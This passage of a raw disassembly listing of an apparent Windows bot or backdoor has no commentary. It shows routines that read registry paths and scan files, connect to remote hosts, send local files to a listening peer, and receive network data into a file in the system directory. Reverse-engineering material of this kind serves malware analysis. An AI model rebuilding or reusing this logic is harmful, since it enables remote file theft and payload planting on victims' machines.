jz short loc_416311
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call dword_4E427C ; SendMessageA
loc_416311: ; CODE XREF: sub_416191+16E�j
push [ebp+var_4]
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416330
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call dword_4E427C ; SendMessageA
loc_416330: ; CODE XREF: sub_416191+18B�j
push [ebp+var_4]
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_41634D
push [ebp+Memory]
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4E427C ; SendMessageA
loc_41634D: ; CODE XREF: sub_416191+1AA�j
push [ebp+Memory] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_41637A
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call dword_4E427C ; SendMessageA
loc_41637A: ; CODE XREF: sub_416191+63�j
; sub_416191+D0�j ...
push [ebp+var_4]
call dword_4E42D0 ; DestroyWindow
mov eax, ebx
loc_416385: ; CODE XREF: sub_416191+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_416191 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41638A(int,size_t Size,int,int,int)
sub_41638A proc near ; CODE XREF: sub_401CC7+7691�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Memory = dword ptr -4
arg_0 = dword ptr 8
Size = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push dword_4EBE94
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow_0 ; "Window"
call dword_4E4170
mov edi, eax
cmp edi, ebx
jnz short loc_4163C8
mov eax, esi
jmp loc_4165C4
; ---------------------------------------------------------------------------
loc_4163C8: ; CODE XREF: sub_41638A+35�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_4163E5
push ebx
push [ebp+Size]
push 40Ah
push edi
call dword_4E427C ; SendMessageA
jmp short loc_4163E7
; ---------------------------------------------------------------------------
loc_4163E5: ; CODE XREF: sub_41638A+47�j
xor eax, eax
loc_4163E7: ; CODE XREF: sub_41638A+59�j
cmp eax, ebx
jnz short loc_4163F2
loc_4163EB: ; CODE XREF: sub_41638A+8B�j
; sub_41638A+BC�j
mov ebx, esi
jmp loc_4165BB
; ---------------------------------------------------------------------------
loc_4163F2: ; CODE XREF: sub_41638A+5F�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416412
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call dword_4E427C ; SendMessageA
loc_416412: ; CODE XREF: sub_41638A+71�j
cmp [ebp+var_7C], ebx
jz short loc_4163EB
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416435
push ebx
push ebx
push 42Ch
push edi
call dword_4E427C ; SendMessageA
mov [ebp+Size], eax
jmp short loc_416438
; ---------------------------------------------------------------------------
loc_416435: ; CODE XREF: sub_41638A+96�j
mov [ebp+Size], ebx
loc_416438: ; CODE XREF: sub_41638A+A9�j
push [ebp+Size] ; Size
call _malloc
cmp eax, ebx
pop ecx
mov [ebp+Memory], eax
jz short loc_4163EB
push [ebp+Size] ; Size
call _malloc
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41645F
push 1
pop ebx
jmp loc_4165BB
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_41638A+CB�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_41647C
push [ebp+Memory]
push [ebp+Size]
push 42Ch
push edi
call dword_4E427C ; SendMessageA
loc_41647C: ; CODE XREF: sub_41638A+DE�j
push [ebp+Size] ; Size
push [ebp+Memory] ; Src
push esi ; Dst
call _memcpy
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_416497
mov ecx, 0A0h
loc_416497: ; CODE XREF: sub_41638A+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_4164A1
push 78h
pop eax
loc_4164A1: ; CODE XREF: sub_41638A+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_4164E6
push esi
push [ebp+Size]
push 42Dh
push edi
call dword_4E427C ; SendMessageA
loc_4164E6: ; CODE XREF: sub_41638A+14A�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416503
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call dword_4E427C ; SendMessageA
loc_416503: ; CODE XREF: sub_41638A+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416541
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call dword_4E427C ; SendMessageA
loc_416541: ; CODE XREF: sub_41638A+1A3�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_41655C
push [ebp+arg_0]
push ebx
push 414h
push edi
call dword_4E427C ; SendMessageA
loc_41655C: ; CODE XREF: sub_41638A+1C0�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416575
push ebx
push ebx
push 43Eh
push edi
call dword_4E427C ; SendMessageA
loc_416575: ; CODE XREF: sub_41638A+1DB�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416592
push [ebp+Memory]
push [ebp+Size]
push 42Dh
push edi
call dword_4E427C ; SendMessageA
loc_416592: ; CODE XREF: sub_41638A+1F4�j
push [ebp+Memory] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_4165BB
push ebx
push ebx
push 40Bh
push edi
call dword_4E427C ; SendMessageA
loc_4165BB: ; CODE XREF: sub_41638A+63�j
; sub_41638A+D0�j ...
push edi
call dword_4E42D0 ; DestroyWindow
mov eax, ebx
loc_4165C4: ; CODE XREF: sub_41638A+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_41638A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4165C9 proc near ; CODE XREF: sub_401CC7+25E6�p
Dest = byte ptr -3F0h
var_2EC = dword ptr -2ECh
var_EC = byte ptr -0ECh
Str = byte ptr -6Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F0h
push edi
xor edi, edi
cmp off_44E354, edi
mov [ebp+var_8], 80h
jz loc_41676E
push ebx
push esi
mov eax, offset off_44E354
mov esi, offset dword_44E360
loc_4165F4: ; CODE XREF: sub_4165C9+19D�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push edi
push dword ptr [eax]
push dword ptr [esi-10h]
call dword_4E4290 ; RegOpenKeyExA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_EC]
push eax
push edi
push edi
push dword ptr [esi-8]
push [ebp+var_4]
call dword_4E4120 ; RegQueryValueExA
test eax, eax
jnz loc_416754
mov eax, [esi]
cmp eax, edi
jz loc_416714
push eax
lea eax, [ebp+var_EC]
push eax
lea eax, [ebp+Dest]
push offset aSS_7 ; "%s\\%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push offset aR_1 ; "r"
push eax ; Filename
call _fopen
mov ebx, eax
add esp, 18h
cmp ebx, edi
jz loc_416754
loc_41666B: ; CODE XREF: sub_4165C9+C9�j
push ebx
lea eax, [ebp+Str]
push 64h
push eax
call sub_41FDD0
add esp, 0Ch
test eax, eax
jz loc_41670B
push dword ptr [esi+4] ; SubStr
lea eax, [ebp+Str]
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_41666B
push 3Dh ; Val
push dword ptr [esi+4] ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jz short loc_4166CB
lea eax, [ebp+Str]
push offset asc_44F628 ; "="
push eax ; Str
call _strtok
push offset asc_44F62C ; "="
push edi ; Str
call _strtok
add esp, 10h
push eax
push dword ptr [esi-4]
push offset dword_44F630
jmp short loc_4166D7
; ---------------------------------------------------------------------------
loc_4166CB: ; CODE XREF: sub_4165C9+D9�j
lea eax, [ebp+Str]
push eax
push dword ptr [esi-4]
push offset asc_44F648 ; "-"
loc_4166D7: ; CODE XREF: sub_4165C9+100�j
lea eax, [ebp+var_2EC]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_2EC]
push edi ; int
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+var_2EC]
push eax
call sub_415C77
add esp, 18h
loc_41670B: ; CODE XREF: sub_4165C9+B3�j
push ebx ; File
call _fclose
pop ecx
jmp short loc_416754
; ---------------------------------------------------------------------------
loc_416714: ; CODE XREF: sub_4165C9+65�j
lea eax, [ebp+var_EC]
push eax
lea eax, [ebp+var_2EC]
push dword ptr [esi-4]
push offset asc_44F660 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+var_2EC]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+var_2EC]
push eax
call sub_415C77
add esp, 28h
loc_416754: ; CODE XREF: sub_4165C9+5B�j
; sub_4165C9+9C�j ...
push [ebp+var_4]
call dword_4E41FC ; RegCloseKey
add esi, 18h
cmp [esi-0Ch], edi
lea eax, [esi-0Ch]
jnz loc_4165F4
pop esi
pop ebx
loc_41676E: ; CODE XREF: sub_4165C9+19�j
pop edi
leave
retn
sub_4165C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416771 proc near ; CODE XREF: sub_4167F7+33�p
; sub_416D5D+BC�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_4E42A0 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_4167ED
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4E4220 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4E4260 ; inet_addr
cmp eax, esi
jnz short loc_4167D2
push [ebp+arg_0]
call dword_4E42A4 ; gethostbyname
test eax, eax
jz short loc_4167ED
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_4167D2: ; CODE XREF: sub_416771+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4E41C8 ; connect
cmp eax, esi
jnz short loc_4167F1
push edi
call dword_4E42B8 ; closesocket
loc_4167ED: ; CODE XREF: sub_416771+1B�j
; sub_416771+58�j
mov eax, esi
jmp short loc_4167F3
; ---------------------------------------------------------------------------
loc_4167F1: ; CODE XREF: sub_416771+73�j
mov eax, edi
loc_4167F3: ; CODE XREF: sub_416771+7E�j
pop edi
pop esi
leave
retn
sub_416771 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167F7 proc near ; DATA XREF: sub_401CC7+9EA�o
Dst = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_416771
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_41688A
lea eax, [ebp+Dst]
push offset asc_44F678 ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_41686D
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409D6C
add esp, 14h
loc_41686D: ; CODE XREF: sub_4167F7+59�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
push [ebp+var_10]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_41688A: ; CODE XREF: sub_4167F7+3F�j
push offset dword_4EBEF8
push ebx
call sub_41AB7D
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4168F5
lea eax, [ebp+Dst]
push offset asc_44F69C ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_4168D1
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409D6C
add esp, 14h
loc_4168D1: ; CODE XREF: sub_4167F7+BD�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
pop ecx
push ebx
call dword_4E42B8 ; closesocket
push [ebp+var_10]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_4168F5: ; CODE XREF: sub_4167F7+A3�j
push 64h
call ds:dword_4F6380 ; Sleep
xor edi, edi
mov esi, 1000h
loc_416904: ; CODE XREF: sub_4167F7+168�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push edi
push esi
push eax
push ebx
call dword_4E4238 ; recv
test eax, eax
jle short loc_416961
lea eax, [ebp+Dst]
push offset asc_44F6CC ; "\n"
push eax ; Dest
call _strcat
lea eax, [ebp+Dst]
push eax ; Str
call sub_41A969
add esp, 0Ch
test eax, eax
jz short loc_416961
push 64h
call ds:dword_4F6380 ; Sleep
push 0Ah
call sub_40B9D6
test eax, eax
pop ecx
jnz short loc_416904
loc_416961: ; CODE XREF: sub_4167F7+130�j
; sub_4167F7+154�j
lea eax, [ebp+Dst]
push offset asc_44F6D0 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_416994
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409D6C
add esp, 14h
loc_416994: ; CODE XREF: sub_4167F7+180�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
pop ecx
push ebx
call dword_4E42B8 ; closesocket
push [ebp+var_10]
call sub_40BAAA
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
sub_4167F7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4169B8 proc near ; DATA XREF: sub_401CC7+7980�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
Dest = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
Str = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dst = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call dword_4E42A0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_416A06
push offset unk_44F704
jmp loc_416BBF
; ---------------------------------------------------------------------------
loc_416A06: ; CODE XREF: sub_4169B8+42�j
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push esi
call dword_4E4220 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call dword_4E424C ; bind
test eax, eax
jz short loc_416A44
push offset unk_44F728
jmp loc_416BBF
; ---------------------------------------------------------------------------
loc_416A44: ; CODE XREF: sub_4169B8+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E41C4 ; getsockname
push [ebp+var_2E]
call dword_4E4150 ; htons
mov [ebp+var_4], eax
lea eax, [ebp+Str]
push eax ; Str
mov [ebp+arg_0], esi
call _strlen
pop ecx
loc_416A76: ; CODE XREF: sub_4169B8+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+Str]
cmp al, 20h
jnz short loc_416A89
push 5Fh
pop eax
jmp short loc_416A8C
; ---------------------------------------------------------------------------
loc_416A89: ; CODE XREF: sub_4169B8+CA�j
movsx eax, al
loc_416A8C: ; CODE XREF: sub_4169B8+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+Str]
inc ecx
push eax ; Str
mov [ebp+arg_0], ecx
call _strlen
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_416A76
push ebx
push edi
call dword_4E4248 ; listen
test eax, eax
jz short loc_416ABF
push offset unk_44F74C
jmp loc_416BBF
; ---------------------------------------------------------------------------
loc_416ABF: ; CODE XREF: sub_4169B8+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+Str]
push 80000000h
push eax
call ds:dword_4F63F4 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_416AE9
push offset unk_44F770
jmp loc_416BBF
; ---------------------------------------------------------------------------
loc_416AE9: ; CODE XREF: sub_4169B8+125�j
push esi
push eax
call ds:dword_4F6410 ; GetFileSize
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AFA9
pop ecx
push eax
call dword_4E4260 ; inet_addr
push eax
call dword_4E421C ; htonl
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset dword_44F790 ; Format
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
lea eax, [ebp+var_DC]
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409D6C
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call dword_4E4208 ; select
test eax, eax
jg short loc_416B99
push esi ; int
lea eax, [ebp+var_DC]
push [ebp+var_54] ; int
push offset dword_44F7A8 ; int
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409D6C
jmp loc_416CBD
; ---------------------------------------------------------------------------
loc_416B99: ; CODE XREF: sub_4169B8+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call dword_4E42B4 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_416BD2
push offset asc_44F7C0 ; "-"
loc_416BBF: ; CODE XREF: sub_4169B8+49�j
; sub_4169B8+87�j ...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_416CC0
; ---------------------------------------------------------------------------
loc_416BD2: ; CODE XREF: sub_4169B8+200�j
push edi
call dword_4E42B8 ; closesocket
cmp [ebp+arg_0], esi
jz loc_416C84
mov edi, 400h
loc_416BE7: ; CODE XREF: sub_4169B8+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_416BF4
mov [ebp+var_4], eax
loc_416BF4: ; CODE XREF: sub_4169B8+237�j
push edi ; Size
lea eax, [ebp+var_A04]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:dword_4F6428 ; SetFilePointer
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:dword_4F63F0 ; ReadFile
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call dword_4E4270 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call dword_4E4238 ; recv
cmp eax, ebx
jl loc_416D19
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_416D19
sub [ebp+arg_0], eax
jnz loc_416BE7
mov edi, [ebp+var_18]
loc_416C84: ; CODE XREF: sub_4169B8+224�j
push [ebp+var_8]
call ds:dword_4F6370 ; CloseHandle
push [ebp+var_C]
push [ebp+var_10]
call sub_4174C3
pop ecx
pop ecx
push eax
push [ebp+var_44]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset asc_44F814 ; "-"
push eax ; Dest
call _sprintf
loc_416CBD: ; CODE XREF: sub_4169B8+1DC�j
add esp, 14h
loc_416CC0: ; CODE XREF: sub_4169B8+215�j
cmp [ebp+var_50], esi
jnz short loc_416CE5
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_54] ; int
push eax ; int
lea eax, [ebp+var_DC]
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409D6C
add esp, 14h
loc_416CE5: ; CODE XREF: sub_4169B8+30B�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
cmp edi, esi
pop ecx
jbe short loc_416CFD
push edi
call dword_4E42B8 ; closesocket
loc_416CFD: ; CODE XREF: sub_4169B8+33C�j
push [ebp+var_1F8]
call dword_4E42B8 ; closesocket
push [ebp+var_58]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_416D19: ; CODE XREF: sub_4169B8+2AF�j
; sub_4169B8+2BA�j
push esi ; int
lea eax, [ebp+var_DC]
push [ebp+var_54] ; int
push offset dword_44F7E4 ; int
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409D6C
push offset dword_44F7FC
call sub_415C77
add esp, 18h
push [ebp+var_1F8]
call dword_4E42B8 ; closesocket
push [ebp+var_58]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
sub_4169B8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D5D proc near ; DATA XREF: sub_401CC7+789�o
Dst = byte ptr -14C4h
Dest = byte ptr -4C4h
Filename = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
Str = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+Filename]
push 104h
push eax
call ds:dword_4F637C ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Filename]
push offset aSS_8 ; "%s%s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Filename]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:dword_4F63F4 ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_416DE7
push offset unk_44F848
jmp short loc_416E2D
; ---------------------------------------------------------------------------
loc_416DE7: ; CODE XREF: sub_416D5D+81�j
push eax
call ds:dword_4F6370 ; CloseHandle
lea eax, [ebp+Filename]
push offset aAB ; "a+b"
push eax ; Filename
call _fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+File], eax
jnz short loc_416E0F
push offset unk_44F87C
jmp short loc_416E2D
; ---------------------------------------------------------------------------
loc_416E0F: ; CODE XREF: sub_416D5D+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_416771
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_416E40
push offset asc_44F8A8 ; "-"
loc_416E2D: ; CODE XREF: sub_416D5D+88�j
; sub_416D5D+B0�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_416F3C
; ---------------------------------------------------------------------------
loc_416E40: ; CODE XREF: sub_416D5D+C9�j
mov esi, 1000h
loc_416E45: ; CODE XREF: sub_416D5D+14E�j
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4E4238 ; recv
mov edi, eax
cmp edi, ebx
jz loc_416F0C
cmp edi, 0FFFFFFFFh
jz short loc_416EAD
push [ebp+File] ; File
lea eax, [ebp+Dst]
push edi ; Count
push 1 ; Size
push eax ; Str
call sub_421FE0
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call dword_4E421C ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
jmp short loc_416E45
; ---------------------------------------------------------------------------
loc_416EAD: ; CODE XREF: sub_416D5D+118�j
lea eax, [ebp+Dest]
push offset asc_44F8C8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_18] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1C0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+File] ; File
call _fclose
add esp, 24h
push [ebp+arg_0]
call dword_4E42B8 ; closesocket
push [ebp+var_1C]
call sub_40BAAA
pop ecx
push 1
call ds:dword_4F63D4 ; ExitThread
loc_416F0C: ; CODE XREF: sub_416D5D+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_4174C3
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+Dest]
push offset asc_44F8E0 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
loc_416F3C: ; CODE XREF: sub_416D5D+DE�j
cmp [ebp+var_14], ebx
jnz short loc_416F61
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_18] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1C0] ; int
call sub_409D6C
add esp, 14h
loc_416F61: ; CODE XREF: sub_416D5D+1E2�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
cmp [ebp+File], ebx
pop ecx
jz short loc_416F7C
push [ebp+File] ; File
call _fclose
pop ecx
loc_416F7C: ; CODE XREF: sub_416D5D+214�j
cmp [ebp+arg_0], ebx
jbe short loc_416F8A
push [ebp+arg_0]
call dword_4E42B8 ; closesocket
loc_416F8A: ; CODE XREF: sub_416D5D+222�j
push [ebp+var_1C]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
sub_416D5D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F9A proc near ; DATA XREF: sub_401CC7+63CB�o
; sub_401CC7+6C09�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
Dst = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
Str = byte ptr -2C8h
var_248 = byte ptr -248h
Filename = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
